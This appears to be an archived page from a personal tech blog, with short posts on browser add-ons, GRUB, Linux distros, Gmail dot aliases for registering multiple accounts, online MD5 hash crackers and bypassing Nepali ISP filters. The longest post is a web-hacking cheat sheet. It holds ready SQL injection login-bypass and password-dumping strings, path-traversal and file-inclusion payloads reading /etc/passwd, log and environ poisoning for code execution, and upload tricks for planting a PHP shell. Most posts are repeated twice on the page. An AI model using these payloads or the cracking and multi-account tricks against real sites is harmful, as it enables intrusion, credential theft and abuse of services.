Thursday 10 February 2011
ieHTTPHeaders : An IE alternative for livehttpheaders add-on
Well IE sucks but still if you need to use it and require some http header viewing addon like livehttpheaders for mozilla firefox, then there exists a tool called ieHTTPHeaders serving the same purpose.
I won't write much about it, just visit the official webpage for more information and download links:
Official webpage of ieHTTPheaders
Thanks.
Read more...
I won't write much about it, just visit the official webpage for more information and download links:
Official webpage of ieHTTPheaders
Thanks.
Read more...
Bookmark this post: | 
|
Tuesday 8 February 2011
How to remove OS Boot Options from GRUB 2
Well due to number of updates, my ubuntu installation was showing numbers of OS boot options and I had to clean up the boot options. With new grub2, removing the older kernel packages from synaptic package manager is sufficient to remove these extra entries from grub. All you have to do is remove the kernel package and then update grub configuration.
In my case, I'll be removing the kernel package version 2.6.35-23 generic so I do search for it in the synaptic package manager.
Now from the search result, I chose the 2.6.35-23 generic and then right clicked and selected Mark for Complete Removal option. Now, we just need to apply the changes and wait for few minutes while everything is being done. The update-grub is done automatically and in case, it is not done, you can do sudo update-grub from terminal.
I hope this helps you. Enjoy :)
Read more...
In my case, I'll be removing the kernel package version 2.6.35-23 generic so I do search for it in the synaptic package manager.
Now from the search result, I chose the 2.6.35-23 generic and then right clicked and selected Mark for Complete Removal option. Now, we just need to apply the changes and wait for few minutes while everything is being done. The update-grub is done automatically and in case, it is not done, you can do sudo update-grub from terminal.
I hope this helps you. Enjoy :)
Read more...
Bookmark this post: |
|
Bittorrent Client for mobiles [Symbian and Java]
We've been using tons of bittorrent clients for P2P file sharing in our computers but now we have now got such bittorrent clients for mobile phones too. Applied Mobile Research Group (AMORG) from Hungary has developed the two bittorrent clients that will work in symbian based phones and java enabled phones.
Symtorrent is the first symbian OS based bittorrent client which supports multiple torrent downloads with both download and upload options. It has every feature that a basic torrent client should have and works in the Symbian OS 3rd and 5th edition. More information on Symtorrent in the official webpage
Mobtorrent is the bittorrent client for the JAVA powered phones so you don't need to worry if you don't have s60 phones.
Also, both of these tools are released under GNU GPL license and hence are free and open source tools. Hope this is informative for you guys. :)
Read more...
Symtorrent is the first symbian OS based bittorrent client which supports multiple torrent downloads with both download and upload options. It has every feature that a basic torrent client should have and works in the Symbian OS 3rd and 5th edition. More information on Symtorrent in the official webpage
Mobtorrent is the bittorrent client for the JAVA powered phones so you don't need to worry if you don't have s60 phones.
Also, both of these tools are released under GNU GPL license and hence are free and open source tools. Hope this is informative for you guys. :)
Read more...
Bookmark this post: |
|
Sunday 6 February 2011
DoudouLinux - Linux designed for children
While going through internet, I came across this interesting linux distribution and just thought to share over here. This distribution is the linux distro called DoudouLinux and is targetted for the children.
It is designed to be very simple and reliable to use for the children and provides applications that suite for the small children of the age range 2-12.
You can read more about and get the download link from HERE.
DOWNLOAD PAGE for DoudouLinux
Read more...
It is designed to be very simple and reliable to use for the children and provides applications that suite for the small children of the age range 2-12.
You can read more about and get the download link from HERE.
DOWNLOAD PAGE for DoudouLinux
Read more...
Bookmark this post: |
|
Multiple accounts with single email account in forums/facebook and other sites
Hi everybody, its been a long time. I was in vacation and tour and was completely away from internet for a while. I will now start to post more regularly. Anyway in this post, I will show you how you can make multiple accounts in different discussion forums, social networking sites and other different sites (and even maybe in IRCs and others) with the single email account. This trick requires a single gmail account.
I accidentally mistyped the extra dot in my gmail account while registering in one forum. But in around a minute, my gmail tab was showing 1 new message in inbox and when I checked it, it was the forum's registration message. Then I tried to find what was going on and even a quick google search revealed that this would actually work.
So the idea is just registering in your target site with multiple forms of your gmail account with dot (.) in different positions. This google answer provides the answer for this so the account coolsamar207@gmail.com would be equivalent to:
cool.samar207@gmail.com
or
coolsamar.207@gmail.com
or
coOlsamar2.07@gmail.com
etc.
This means you can register in the forums/sites with any of the above(and much more) gmail accounts and still the email confirmation would come to your email account. I mean each accounts in the site would be actually associated with the single gmail account.
I tested this with fluxbb and facebook and was working well. I guess it would work for other social networking sites like myspace, twitter, etc. This might come handy for many of you guys for different purposes. If you got any queries, feel free to ask here.
Read more...
I accidentally mistyped the extra dot in my gmail account while registering in one forum. But in around a minute, my gmail tab was showing 1 new message in inbox and when I checked it, it was the forum's registration message. Then I tried to find what was going on and even a quick google search revealed that this would actually work.
So the idea is just registering in your target site with multiple forms of your gmail account with dot (.) in different positions. This google answer provides the answer for this so the account coolsamar207@gmail.com would be equivalent to:
cool.samar207@gmail.com
or
coolsamar.207@gmail.com
or
coOlsamar2.07@gmail.com
etc.
This means you can register in the forums/sites with any of the above(and much more) gmail accounts and still the email confirmation would come to your email account. I mean each accounts in the site would be actually associated with the single gmail account.
I tested this with fluxbb and facebook and was working well. I guess it would work for other social networking sites like myspace, twitter, etc. This might come handy for many of you guys for different purposes. If you got any queries, feel free to ask here.
Read more...
Bookmark this post: |
|
Friday 7 January 2011
List of online MD5 [+ other] hash crackers
Here is the list of some of the online MD5 hash cracking services you might find useful. Some of them offer cracking of other hashes like SHA1, LM, MySQL, etc.
HashKiller.com, My personal favorite
Md5decrypter.co.uk, Another service I try
md5.rednoize.com
md5cracker.com, performs lookup in different online hash crackers
Passcracking.com
cmd5.org
Plain-Text.info
lmcrack.com
HashCrack.com
There are more other online md5 crackers but these would be enough to crack the hashes, if not they are unlikely any other online crackers would crack them (except the dedicated and paid ones). I hope this helps you.
EDIT: Few more online crackers added:
HashChecker.de
Md5This.com
TMTO.Org
Read more...
HashKiller.com, My personal favorite
Md5decrypter.co.uk, Another service I try
md5.rednoize.com
md5cracker.com, performs lookup in different online hash crackers
Passcracking.com
cmd5.org
Plain-Text.info
lmcrack.com
HashCrack.com
There are more other online md5 crackers but these would be enough to crack the hashes, if not they are unlikely any other online crackers would crack them (except the dedicated and paid ones). I hope this helps you.
EDIT: Few more online crackers added:
HashChecker.de
Md5This.com
TMTO.Org
Read more...
Bookmark this post: |
|
Sunday 26 December 2010
Bypass web filters of Nepali ISPs
Well okay, I am here to rescue you if you are facing the problem of finding the website you want to visit getting blocked by the ISPs. After NTA sent the letters to the ISPs in Nepal to block the sites with some potentially bad contents, ISPs have started doing filtering and blocking of the websites. In this post, I am going to show you how to bypass the web filters being applied by the ISPs. I've tested with the websurfer ISP but still you might find one of these ways working for you.
Method #1:
So I assume you are searching for some stuffs in the torrent and lets say your search query goes to the URL.
For example, I search for sex comedy movie in torrentz.eu, the search query would result in a URL like:
Unfortunately websurfer blocks the keywork sex from the URL query so we get the page like below:
Now lets change our query by searching with the caps version of sex i.e. SEX to bypass such filtering. The new URL after entering search keywords would be:
And this time you get the valid webpage with your expected search results. Wasn't that easy bypassing this lame blocking?
Method #2:
I was checking the lists of the websites which were being blocked by Nepali ISPs and my eyes caught utube.com and I tried opening it. But it was another site to be blocked.
Check the screenshot below:
This time I am using the internet protocol address (IP Address of the website) to visit the website. In order to find the IP of any website, you can simply do:
This will give you the IP of the website. For utube.com, the associated IP was 67.192.184.210 so now on your browser, type the address of the website as http://67.192.184.210 and that would bypass and open the website.
Method #3:
Using proxy
While this tends to be slow for me, you can use the freely available proxies to bypass the web filters. I will leave this technique to do on your own as there are hundreds of tutorials on how to use proxies. Anyway, I leave you with the site called Samair.ru which consists of tons of proxies to be used.
Also, you might try installing the TOR software in your system(works pretty well for me).
Method #4:
Another way is to use the alternative DNS servers which will work perfectly if the ISP is blocking the websites based on DNS resolutions. You can use the DNS servers from OpenDNS or Google or you may google for other free DNS servers. Be sure to choose the good DNS server while doing so. The good thing about OpenDNS is that it also provides anti-phishing protection that your ISP might not be providing.
Google's DNS IPs: 8.8.8.8 and 8.8.4.4
OpenDNS IPs: 208.67.220.220 and 208.67.222.222
You can then set up the DNS servers either in router or your PC as required.
Method #5 and more:
I will update this post when I test things more and more. I haven't tested with VPNs, google cache, translators, etc. These days, ISPs are also blocking the websites by combining the above discussed methods further aided by the deep packet inspection.
I hope this helps some of you out there. Thanks.
Read more...
Method #1:
So I assume you are searching for some stuffs in the torrent and lets say your search query goes to the URL.
For example, I search for sex comedy movie in torrentz.eu, the search query would result in a URL like:
http://torrentz.eu/search?f=sex+comedy+movie
Unfortunately websurfer blocks the keywork sex from the URL query so we get the page like below:
Now lets change our query by searching with the caps version of sex i.e. SEX to bypass such filtering. The new URL after entering search keywords would be:
http://torrentz.eu/search?f=SEX+comedy+movie
And this time you get the valid webpage with your expected search results. Wasn't that easy bypassing this lame blocking?
Method #2:
I was checking the lists of the websites which were being blocked by Nepali ISPs and my eyes caught utube.com and I tried opening it. But it was another site to be blocked.
Check the screenshot below:
This time I am using the internet protocol address (IP Address of the website) to visit the website. In order to find the IP of any website, you can simply do:
ping utube.com
This will give you the IP of the website. For utube.com, the associated IP was 67.192.184.210 so now on your browser, type the address of the website as http://67.192.184.210 and that would bypass and open the website.
Method #3:
Using proxy
While this tends to be slow for me, you can use the freely available proxies to bypass the web filters. I will leave this technique to do on your own as there are hundreds of tutorials on how to use proxies. Anyway, I leave you with the site called Samair.ru which consists of tons of proxies to be used.
Also, you might try installing the TOR software in your system(works pretty well for me).
Method #4:
Another way is to use the alternative DNS servers which will work perfectly if the ISP is blocking the websites based on DNS resolutions. You can use the DNS servers from OpenDNS or Google or you may google for other free DNS servers. Be sure to choose the good DNS server while doing so. The good thing about OpenDNS is that it also provides anti-phishing protection that your ISP might not be providing.
Google's DNS IPs: 8.8.8.8 and 8.8.4.4
OpenDNS IPs: 208.67.220.220 and 208.67.222.222
You can then set up the DNS servers either in router or your PC as required.
Method #5 and more:
I will update this post when I test things more and more. I haven't tested with VPNs, google cache, translators, etc. These days, ISPs are also blocking the websites by combining the above discussed methods further aided by the deep packet inspection.
I hope this helps some of you out there. Thanks.
Read more...
Bookmark this post: |
|
Web Hacking for Beginners and Intermediates
This is the article I posted on the secworm contest and I am now posting this in my blog. Its not that well written due to the lack of time but still will help some of you out there.
Hi all, I am Deadly Ghos7 aka sam207 and this is my article as the entry for the secworm contest #1. First, I would like to apologize for any kind of grammar mistakes in this article as there would be surely lots of grammatical errors in this article.
This article is not an article about teaching the basics of any web hacking techniques. Instead, it is the document of tips and tricks that the beginners and intermediates can make use of in order to attack the web applications on certain scenarios. I assume that you know the basics of the web hacking techniques or you could google for learning the basics. I'll be covering the tricks on different web hacking methods such as SQL injection(MySQL basically), insecure file inclusions, insecure file upload, etc. As already stated, the article won't be about basic but rather would present you few useful tricks that might be useful in the course of web-app pentesting.
SQL Injection:
Comments: - - , /* , #
MySQL version: SELECT @@version
Current SQL User: SELECT user()
SELECT system_user()
Current Database: SELECT database()
MySQL Data directory(location of MySQL data files): SELECT @@datadir
List all MySQL users: SELECT host, user, password FROM mysql.user
Bypass Quotes: SELECT pass FROM users WHERE user=0x2773616d32303727 --hex
SELECT pass FROM users WHERE user=char
Load local file: SELECT LOAD_FILE('/etc/passwd') --We can use quote bypassing here.
Create File with SQLi: SELECT * FROM table INTO dumpfile '/tmp/dump'
SELECT password FROM user INTO OUTFILE '/home/samar/www/dump.txt'
quote bypassing seems not working here. The path can't be encoded using the quote or char so we can't bypass the quote in this case.
Using limit: union all select null,table_name,null from information_schema.tables LIMIT 20,1
(useful when only one column is seen while doing SQLi)
unhex(hex()): union all select 1,concat(unhex(hex(username,0x3a,password))) from tblusers--
Bypassing filters:
uNiOn aLl SeLeCT 1,2 FrOm tbluser
/*!union*/ all select 1,2 from tbluser
union(select(null),table_name(from)(information_schema.tables)) --Bypassing the whitespace filter
0%a0union%a0select%091
XSS with SQLi (SIXSS): union all select 1,<script>alert(123)</script>
Login bypass:
'=' in both username and password field
' or 1='1'--
' or 1='1'/*
' or 1='1'#
' or 1='1';
In the username field and random password, it would bypass the vulnerable authentication login.
' /*or*/ 1='1 –Bypasses or filter
File Inclusion:
-> A sample vulnerable piece of code would be something like below: test.php
including file in the same directory
test.php?page=.htaccess
test.php?page=.htpasswd
path traversal to include files in other directories
test.php?page=../../../../../../../../../etc/passwd
Nullbyte injection
test.php?page=../../../../../etc/passwd
Directory listing with nullbyte injection only for FreeBSD (afaik) and magic quotes off
test.php?page=../../../../home/
PHP stream/wrappers inclusion
test.php?page=php://filter/convert.base64-encode/resource=config.php
Path Truncation inclusion
test.php?page=../../../../../../etc/passwd.\.\.\.\.\.\.\.\.\.\.\ …
With more details on this, http://www.ush.it/2009/02/08/php-filesystem-attack-vectors/
Apache Log injection
test.php?page=../logs/access.log
You'll have to find the location of the log in order to include it. Also you should try including everything you can such as the session files, uploaded files, etc. For the apache log injection, you'll have to telnet and send the GET request for arbitrary PHP code like Get / Few apache log locations to try are as below:
Useragent
test.php?page=../../../../../../../proc/self/environ
Set your useragent to some php code and it will get executed if you are able to include the /proc/self/environ file.
Check existence of folder:
test.php?page=../../../../../folder/you/guess/../../../../../etc/passwd
Here the trick is basically using the path traversal method.
File upload:
Nullbyte injection: If only valid extensions(such as jpg, gif) are allowed, we can rename our shell to shell.php.jpg which will bypass the file upload security check.
PHP code within image: Sometimes the uploads are not checked for the file extension but for dimensions of images. This again can be bypassed by injecting PHP codes in the valid images and renaming them to .php file. The tool named edjpgcom can be used in order to inject the PHP code as JPEG comments in the images.
Header bypass: Again sometimes the developer just relies on the header information that contains the type of the file like “image/jpeg” for jpeg image. But since this is passed from client side, it can be modified using the tools such as tamper data or live http headers.
Also, the file upload feature can be exploited in union with the file inclusion vulnerability. If you have a site vulnerable to the file inclusion but not vulnerable to the insecure file upload, you can upload valid image as said in second method here and then you can include that file with the file inclusion vulnerable PHP script.
As said earlier, this article is not about giving you every steps of how to exploit the web vulnerabilities.
Read more...
Hi all, I am Deadly Ghos7 aka sam207 and this is my article as the entry for the secworm contest #1. First, I would like to apologize for any kind of grammar mistakes in this article as there would be surely lots of grammatical errors in this article.
This article is not an article about teaching the basics of any web hacking techniques. Instead, it is the document of tips and tricks that the beginners and intermediates can make use of in order to attack the web applications on certain scenarios. I assume that you know the basics of the web hacking techniques or you could google for learning the basics. I'll be covering the tricks on different web hacking methods such as SQL injection(MySQL basically), insecure file inclusions, insecure file upload, etc. As already stated, the article won't be about basic but rather would present you few useful tricks that might be useful in the course of web-app pentesting.
SQL Injection:
Comments: - - , /* , #
MySQL version: SELECT @@version
Current SQL User: SELECT user()
SELECT system_user()
Current Database: SELECT database()
MySQL Data directory(location of MySQL data files): SELECT @@datadir
List all MySQL users: SELECT host, user, password FROM mysql.user
Bypass Quotes: SELECT pass FROM users WHERE user=0x2773616d32303727 --hex
SELECT pass FROM users WHERE user=char
Load local file: SELECT LOAD_FILE('/etc/passwd') --We can use quote bypassing here.
Create File with SQLi: SELECT * FROM table INTO dumpfile '/tmp/dump'
SELECT password FROM user INTO OUTFILE '/home/samar/www/dump.txt'
quote bypassing seems not working here. The path can't be encoded using the quote or char so we can't bypass the quote in this case.
Using limit: union all select null,table_name,null from information_schema.tables LIMIT 20,1
(useful when only one column is seen while doing SQLi)
unhex(hex()): union all select 1,concat(unhex(hex(username,0x3a,password))) from tblusers--
Bypassing filters:
uNiOn aLl SeLeCT 1,2 FrOm tbluser
/*!union*/ all select 1,2 from tbluser
union(select(null),table_name(from)(information_schema.tables)) --Bypassing the whitespace filter
0%a0union%a0select%091
XSS with SQLi (SIXSS): union all select 1,<script>alert(123)</script>
Login bypass:
'=' in both username and password field
' or 1='1'--
' or 1='1'/*
' or 1='1'#
' or 1='1';
In the username field and random password, it would bypass the vulnerable authentication login.
' /*or*/ 1='1 –Bypasses or filter
File Inclusion:
-> A sample vulnerable piece of code would be something like below: test.php
including file in the same directory
test.php?page=.htaccess
test.php?page=.htpasswd
path traversal to include files in other directories
test.php?page=../../../../../../../../../etc/passwd
Nullbyte injection
test.php?page=../../../../../etc/passwd
Directory listing with nullbyte injection only for FreeBSD (afaik) and magic quotes off
test.php?page=../../../../home/
PHP stream/wrappers inclusion
test.php?page=php://filter/convert.base64-encode/resource=config.php
Path Truncation inclusion
test.php?page=../../../../../../etc/passwd.\.\.\.\.\.\.\.\.\.\.\ …
With more details on this, http://www.ush.it/2009/02/08/php-filesystem-attack-vectors/
Apache Log injection
test.php?page=../logs/access.log
You'll have to find the location of the log in order to include it. Also you should try including everything you can such as the session files, uploaded files, etc. For the apache log injection, you'll have to telnet and send the GET request for arbitrary PHP code like Get / Few apache log locations to try are as below:
Useragent
test.php?page=../../../../../../../proc/self/environ
Set your useragent to some php code and it will get executed if you are able to include the /proc/self/environ file.
Check existence of folder:
test.php?page=../../../../../folder/you/guess/../../../../../etc/passwd
Here the trick is basically using the path traversal method.
File upload:
Nullbyte injection: If only valid extensions(such as jpg, gif) are allowed, we can rename our shell to shell.php.jpg which will bypass the file upload security check.
PHP code within image: Sometimes the uploads are not checked for the file extension but for dimensions of images. This again can be bypassed by injecting PHP codes in the valid images and renaming them to .php file. The tool named edjpgcom can be used in order to inject the PHP code as JPEG comments in the images.
Header bypass: Again sometimes the developer just relies on the header information that contains the type of the file like “image/jpeg” for jpeg image. But since this is passed from client side, it can be modified using the tools such as tamper data or live http headers.
Also, the file upload feature can be exploited in union with the file inclusion vulnerability. If you have a site vulnerable to the file inclusion but not vulnerable to the insecure file upload, you can upload valid image as said in second method here and then you can include that file with the file inclusion vulnerable PHP script.
As said earlier, this article is not about giving you every steps of how to exploit the web vulnerabilities.
Read more...
Bookmark this post: |
|
Subscribe to:
Posts (Atom)